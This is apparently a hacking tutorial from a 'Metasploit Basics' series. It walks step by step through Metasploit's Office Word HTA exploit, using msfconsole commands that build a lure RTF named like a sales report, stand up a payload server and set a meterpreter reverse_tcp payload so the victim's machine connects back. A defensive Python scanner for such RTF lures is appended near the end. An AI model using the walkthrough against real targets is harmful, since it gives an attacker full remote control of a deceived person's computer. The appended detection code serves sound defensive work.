Welcome back, my fledgling hackers!
As operating system developers become more and more security conscious, operating system exploits become rarer. Not so rare that we don't see them anymore (see EternalBlue and the .NET vulnerability CVE-2017-8759), but rare enough that hackers tend to focus their efforts on applications and their output files for exploitation. These might include such things as PDF, .doc, .rtf, .jpg, .lnk and .xls files. These types of exploits are referred to as "file format" exploits because they exploit a particular file format.
Metasploit has a large number of these file format exploits. To find them, we can go to the:
/usr/share/metasploit-framework/modules/exploits/windows/fileformat
directory in Metasploit. There, we can find numerous exploits that fit the file format category. One of the best and most recent is known as the Office Word hta exploit.
This exploit, first found in the wild in late 2016, enables us to create a carefully crafted Office document that when opened by the target will embed a rootkit within their system and give us complete control.
Let's look at this exploit in this tutorial.
Step #1 Fire Up Kali and Open Metasploit
Step #2 Search for Office Word hta exploit
With the Metasploit console now open, let's look for this exploit.
msf > search type:exploit fileformat
As you can see above, Metasploit returned a large number of exploits, but I highlighted the "Malicious Office Word Malicious Hta Execution". That's the one we want to use here.
Step #3 Load the Office Word HTA Exploit
Let's now load that exploit.
msf > use exploit/windows/fileformat/office_word_hta
Now, with the exploit loaded, let's take a look at the information on this exploit.
msf > info
As you can see above, this exploit creates a malicious RTF file that will enable us to execute our code on the target system when they open it. That's exactly what we want to do!
Step #4 Show Options
The next step is to take a look at our options for this exploit.
msf > show options
As you can see, we need to set the FILENAME (it defaults to msf.doc, which is not very stealthy), the URIPATH and the SRVHOST.
msf > set FILENAME hackersarise_sales_report
msf > set URIPATH hackersarise
msf > set SRVHOST 192.168.1.115
Step #5 Set The PAYLOAD
The next step is to set the PAYLOAD we want to embed on the target system when they open the file. Let's choose our powerful and trusty windows/meterpreter/reverse_tcp.
msf > set PAYLOAD windows/meterpreter/reverse_tcp
When we once again "show options", we can see that we need to set the payload LHOST.
Let's set it to our Kali system.
msf > set LHOST 192.168.1.115
Now, all we need to do is enter exploit and Metasploit generates a file named hackersarise_sales_report and places it in the /root/.msf4/local directory. It then starts a server at 192.168.1.115 on port 8080. All that is left is to send the file to the target; when they open it, it will connect to our server, download the meterpreter and connect back to our Kali system, giving us unfettered access to their computer.
We should receive a meterpreter prompt like the one above.
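For the defensive side of this technique, here is an added triage scanner (my own example, not Metasploit's code and not part of the original tutorial) that flags the kind of document this module produces: an RTF handed out under a .doc name, an embedded \object marked to refresh when the document opens, and a URL or .hta reference inside the hex-encoded \objdata. The sample documents, hostnames and score weights are constructed for illustration.

```python
import re

# Markers of an RTF that pulls in an external object when the document opens.
RTF_MAGIC = b"{\\rtf"
AUTO_UPDATE_WORDS = (b"\\objautlink", b"\\objupdate")
OBJDATA_RE = re.compile(rb"\\objdata\s*([0-9A-Fa-f\s]+)")
URL_RE = re.compile(rb"(https?://[^\s\x00\"'<>]+|[\w.-]+\.hta\b)", re.IGNORECASE)

def decode_objdata(hex_blob: bytes) -> bytes:
    """\\objdata carries the OLE object as ASCII hex; strip whitespace and decode."""
    clean = re.sub(rb"\s+", b"", hex_blob)
    return bytes.fromhex(clean[: len(clean) & ~1].decode("ascii"))  # drop odd nibble

def scan_rtf(data: bytes, filename: str) -> tuple[int, list[str]]:
    """Score a file for the RTF-with-remote-object pattern; returns (score, findings)."""
    findings, score = [], 0
    if not data.lstrip().startswith(RTF_MAGIC):
        return 0, []                                   # not RTF: out of scope here
    ext = filename.rsplit(".", 1)[-1].lower() if "." in filename else ""
    if ext in ("doc", "dot", "docx"):                  # msf.doc-style disguise
        score, findings = score + 1, findings + [f"named .{ext} but content is RTF"]
    if b"\\object" in data:
        score, findings = score + 1, findings + ["embedded \\object"]
    for word in AUTO_UPDATE_WORDS:                     # object refreshed on open
        if word in data:
            score, findings = score + 2, findings + [f"auto-update control word {word.decode()}"]
    remote = set()
    for m in OBJDATA_RE.finditer(data):
        try:
            payload = decode_objdata(m.group(1))
        except ValueError:
            score, findings = score + 1, findings + ["undecodable \\objdata blob"]
            continue
        # strings inside the OLE stream may be ASCII or UTF-16LE; check both views
        for view in (payload, payload.replace(b"\x00", b"")):
            remote.update(URL_RE.findall(view))
    for ref in sorted(remote):
        score, findings = score + 3, findings + [f"remote reference: {ref.decode(errors='replace')}"]
    return score, findings

def is_suspicious(data: bytes, filename: str, threshold: int = 4) -> bool:
    return scan_rtf(data, filename)[0] >= threshold

# Constructed samples (not real lures): an auto-updating object pointing at an .hta, and a plain RTF.
_URL = b"http://lure.example.invalid/hackersarise.hta"
SAMPLE_LURE = (b"{\\rtf1\\ansi{\\object\\objautlink\\objupdate{\\*\\objdata "
               + (b"\x01\x05\x00\x00\x02\x00" + _URL).hex().encode() + b"}}}")
SAMPLE_CLEAN = b"{\\rtf1\\ansi Quarterly sales report, nothing embedded.}"
```

Run scan_rtf over a mail gateway's quarantined attachments and the findings list tells an analyst why a file scored, which is more useful than a bare verdict.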
Keep coming back, my fledgling hackers, to learn how to use Metasploit for hacking in this "Metasploit Basics" series, and nearly every other form of hacking, on Hackers-Arise!